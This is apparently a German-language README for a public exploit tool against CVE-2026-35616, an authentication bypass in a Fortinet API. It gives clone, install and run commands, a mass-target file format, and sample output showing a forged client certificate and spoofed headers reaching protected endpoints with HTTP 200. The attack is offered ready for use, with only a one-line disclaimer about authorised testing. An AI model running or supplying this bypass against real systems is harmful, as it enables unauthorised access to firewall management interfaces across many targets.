
Exploit-Skript für CVE-2026-35616, das die Zertifikatsketten-Überprüfung in der Fortinet-API umgeht, indem gültige CNs ermittelt, ein gefälschtes Client-Zertifikat erzeugt und geschützte Endpunkte mit benutzerdefinierten Headern untersucht werden.
Ausnutzung der Schwachstelle zur Umgehung der Zertifikatskettenprüfung in der Fortinet-API.
Das Skript erkennt automatisch gültige Common Names (CN) aus verschiedenen Quellen,
generiert ein gefälschtes Client-Zertifikat und führt Anfragen an geschützte Endpunkte
unter Verwendung der Header X-SSL-CLIENT-VERIFY und X-SSL-CLIENT-CERT aus.
!!!Wichtig: Verwenden Sie dies nur auf Systemen, für die Sie eine ausdrückliche Testgenehmigung haben.
requestscryptographyurllib3openssl# Projekt klonen
git clone https://github.com/wa6n3r/CVE-2026-35616
cd CVE-2026-35616
# Abhängigkeiten installieren
pip install -r requirements.txt
## Verwendung
# Basisstart
python3 exploit.py
# Mit Angabe von Ziel und Port
python3 exploit.py <TARGET_IP> [PORT]
# Beispiele:
python3 exploit.py 192.168.1.100
python3 exploit.py 10.0.0.50 8443
# Format der Zieldatei (targets.txt)
Erstellen Sie für Massentests eine Datei targets.txt mit einer Zieladresse pro Zeile:
192.168.1.100:443
10.0.0.50:8443
fortigate.internal
# Ausgabedateien
Bei erfolgreicher Ausführung erstellt das Skript:
results/bypass_results_<TARGET>_<PORT>_<TIMESTAMP>.json — detaillierter Bericht im JSON-Format mit:
Verwendetem CN
Antwortstatus für jeden Endpunkt
Antwortpräfixen zur Analyse
# Ausgabestruktur
[ wa6n3r ] ◆ GH: github.com/wa6n3r ◆ WEB: wa6n3r.com
[*] CVE-2026-35616 Ziel: https://192.168.1.100:443
[*] Ermittle CA-CNs aus mehreren Quellen...
[•] TLS-CA-CN: 'fortinet-ca2'
[•] ZTNA-CA-CN: 'support'
[*] 2 Kandidaten-CN(s) gefunden: fortinet-ca2, support
[*] Teste 2 Kandidaten-CN(s) auf Umgehung...
[+] CN='support' | HTTP 200 | retval=1 | BYPASS BESTÄTIGT
[*] Untersuche alle cert_chain-Endpunkte mit CN='support'...
GET /api/v1/system/capabilities
HTTP 200: '{"result": {"retval": 1, ...}}'
[+] Ergebnisse gespeichert unter: results/bypass_results_192.168.1.100_443_20260101_120000.json